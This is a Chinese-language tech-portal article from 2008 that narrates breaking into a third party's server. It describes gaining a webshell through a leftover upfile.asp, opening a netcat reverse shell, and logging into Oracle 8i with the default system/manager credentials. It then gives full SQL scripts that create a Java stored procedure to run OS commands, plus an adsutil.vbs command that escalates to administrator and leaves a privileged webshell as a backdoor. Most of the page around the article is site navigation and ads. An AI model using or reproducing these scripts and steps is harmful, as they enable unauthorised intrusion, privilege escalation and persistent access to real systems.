个人 | 笔记本 | 数码影象 | MP3/MP4 | 数字家电 | 手机 | GPRS导航 | 办公 | 打印扫描 | 投影仪 | 闪存 | U盘
硬件 | 显示器 | 机箱电源 | 装机指南 | 音箱耳麦 | 网卡 | CPU内存 | 鼠标 | 移动存储 | 摄象头 | 主板 | 显卡
企业 | 服务器 | 台式电脑 | 网络产品 | 技术社区 | 存储 | 网络通信 | 互动 | 人才招聘 | 论 坛 | 博客 | 相册
笔记本 台式机 MP3/MP4 主板 CPU 硬盘 存储 相机 办公 软件 手机 显卡 服务器 网卡
 您现在的位置 >首页>IT技术社区>病毒防范>正文
利用Oracle系统账户默认口令提升权限
于:2008-7-30 14:56:00 来源于:来源: 作者: 作者: 点击次数:

  近日,偶到一主机上逛了一圈。主机的配置还算是安全,偏偏一个比较隐藏的目录下残留了upfile.asp,结果轻轻松松的得到了webshell。

  接着在主机上逛了逛,拿出superscan从外面扫了下,只开放了80端口。

  从user\程序目录里,发现有一快捷方式:firecontrol,好象是某款硬件防火墙的控制台。WEBSHELL下检测了下开放的服务,发现一般的可提权的方法都不可行,无SERV-U等等,主机的补丁也是打到了最新。

  试了下传了个NC上去,反连接得到一SHELL,这下比在老兵的管理器里舒服多了。 在C盘下看到一个目录oracle,看了下C:\oracle\ora81\network\ADMIN\tnsnames.ora文件,确定了主机的服务名“xxx”,看了下版本“oracle 8i”,用数据库连接器 Provider=MSDAORA.1;Password=manager;User ID=system;DataSource=xxxx试了下默认的system账户,密码manager,结果真的就连接到了本地的oracle服务。

  这下好了,oracle的system账户就像是mssql下的sa,我们来通过他来提升权限,马上编辑了几个脚本。

  1.sql create or replace and compilejava source named "Util"asimport java.io.*;import java.lang.*; public class Util extends Object{public static int RunThis(String args){Runtime rt = Runtime.getRuntime();int rc = -1; try{Process p = rt.exec(args);int bufSize = 4096;BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);int len;byte buffer[] = new byte[bufSize];// Echo back what the program spit outwhile ((len = bis.read(buffer, 0, bufSize)) != -1)System.out.write(buffer, 0, len); rc = p.waitFor();}catch (Exception e){e.printStackTrace();rc = -1;}finally{return rc;}}}

  2.sql create or replacefunction RUN_CMD(p_cmd in varchar2) return numberaslanguage javaname 'Util.RunThis(java.lang.String) return integer';

  3.sql create or replace procedure RC(p_cmd in varchar2)asx number;beginx := run_cmd(p_cmd);end;保存在c:\下,然后用反连接得到的shell运行sqlplussystem/manager@xxx然后再来执行脚本。

  SQL>@C:\1.sqlSQL>@C:\2.sqlSQL>@C:\3.sql

  看到JAVA已创建、函数已创建、过程已创建,接着我们继续

  SQL> variable x number;SQL> set serveroutput onSQL> exec dbms_java.set_output(100000);SQL>grant javasyspriv to system

  看到授权成功。接着我们就可以来执行系统命令了。

  我想先把ASP.dll加入特权一组

  SQL>exec :x := RUN_CMD('cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "c:\winnt\system32\inetsrv\asp.dll" ');

  看到过程已经成功完成,这个时候我们重新登陆我们的webshell,他已经具有admin权限了。接着,再用NC返回一个shell,已经是管理权限的,我们可以做我们想干的事了。因为这个主机有防火墙过滤除80以外的端口,所以不好做图形的后门,只有留下一有权限的webshell。

责任编辑:admin
上一篇:RealPlayer曝漏洞!可能被黑客利用
下一篇:黑客是如何穿透ADSL路由入侵内网?
 热点专题

·[天水]双核独显HDMI 惠普V3907TX降到6450元
·[天水]PM45加高清独显 惠普6531s送礼报6560
·[天水]双核独显商务本 惠普6520s仅售5800
·[天水]十一黄金周大促销双核独显商务本 HP 653
·[兰州]冠捷旗下梦想家新品22寸液晶到货兰州
·[北京]惠普酷睿2双核160G硬盘笔记本4399元
·[天水]专为学生打造配置 联想家悦 H1109仅售37
·[天水]学生机大促销 清华同方真爱T5110仅售365

 本周热销
·[热销] [天水]专为学生打造配置 联想家悦 H110
·[热销] [天水]学生机大促销 清华同方真爱T5110
·[热销] [天水]十一黄金周大促销双核独显商务本
·[热销] [天水]PM45加高清独显 惠普6531s送礼报
·[热销] [天水]双核独显HDMI 惠普V3907TX降到64
·[热销] [兰州]本本也需散热 酷睿能翻盖散热器登
·[热销] 老平台不断探底 6款最热门独显双核本
·[热销] 华硕780G杀499 1800元游戏电脑咋攒
·[热销] 三星24宽屏狂降1000 本周降价大排行
·[热销] 一月狂跌2000元!6款狂降价GTX200推荐
·[热销] 445元绝对超低价 华硕移动人士AP不贵
 促销商品

·[促销] [成都]导航商务机多普达P860现2890热卖
·[促销] [成都]影音本年末促销宏碁4920G又降500
·[促销] [成都]2G+250G 联想昭阳E23现仅4499元
·[促销] [成都]商务机ThinkPad SL500现6700!
·[促销] [重庆]玩家新年牛礼 旌宇9800GTX+亮相
·[促销] [重庆]时尚小本典范 联想S10元旦价3399
·[促销] [重庆]专业游戏即时拍 索爱F305惊爆980
·[促销] [重庆]应有尽有性能王 DEC大作A6并不贵
·[促销] [重庆]柏灵专业摄像灯 BL-DC75W只卖410
·[促销] [重庆]CMMB电视智能机 mopad 8震撼上市

 厂商动态
·[商家] 华硕笔记本天水专卖店
·[商家] 天水电子科技城二楼新方大联想专卖
·[商家] 明亮眼睛看奥运 润眼电脑受追捧
·[商家] 方正R620G-400暑促全新升级5200元
·[商家] 世界依然精彩——方正R620G换脸
·[商家] dell瞻前顾后做渠道 何时给颗定心丸?
·[商家] 长沙国储要涨租?淡季此举无疑是雪上
·[商家] [杭州]手机vs电脑,3G时代到底谁当家
更多...
 相关产品

 最新推荐产品

旗舰机的魅力 各品牌 三星超薄滑盖不足1K P&E08:三菱推出数码 傣族舞蹈上演快看索

 友情链接 甘肃IT在线热忱欢迎各类网站友情链接,首页链接要求:PR>=4,PR低的我们将全部调整至内页,还望见谅,谢谢合作!
甘肃IT在线 赤壁信息网 IT168 IT专卖网 IT家园 IT世界网 山西IT新闻网 中卫日报 陕西硅业在线 上午下午网
设计源论坛 常州电脑网 宁夏IT网 福源视讯安防 兰州学生网 北京翻译公司 贵州IT在线 华陈在线 东北IT网 天津律师
笔记本维修 数据恢复 注册香港公司 编程下载 搜易网 武威114黄页 北京数据恢复 福建大学生在线 甘肃网址大全 橄榄油
陇西信息港 火车网 IT业界资讯网 新浪兰州 北京汽车租赁 天津法律咨询网 电脑商情甘肃站 甘肃IT资讯网 甘肃网址 首席科技
租车网 上海租车 汽车租赁 IT批发网 中国linux学院 珠海IT网 天极网 西部IT网 烟台大学生 华中学生网
青海IT数码巷 山东IT在线 山西IT在线 温州数码 CCNA 西北资讯网 黄河IT网 石家庄之窗 新石家庄门户 折客吧
非常在线 西北IT网 IT专家网 河北之窗 天天IT网 39健康网 辽宁大学生 114网址导航 河北娱乐网 爱宝宝
天水之窗 陇南在线 福州生活网 RAID数据恢复 中华智慧女性网 白银商务在线 睿达网络科技 河南信息网 酷搜网 西极IT网
武汉兼职网 北京租车网 苹果在线 耐腐蚀泵 硬盘数据恢复 RAID数据恢复 中小企业IT网 丽江旅行社 IT商业新闻网 兰州民生信息网
站长声明:本站资料来源于大型网站,如有侵权行为,请联系站长,经证实后我们立即将其删除!——甘肃IT在线
设为首页 | 收藏本页 | 郑重声明 | 网站地图 | 关于我们 | 友情链接 | 联系我们

CopyRight ©2008-2009  甘肃IT在线 All Rights Reserved QQ群:31084900
在线咨询:422189997314068445 Email:gsitonline@163.com

陇ICP号申备中 流量统计: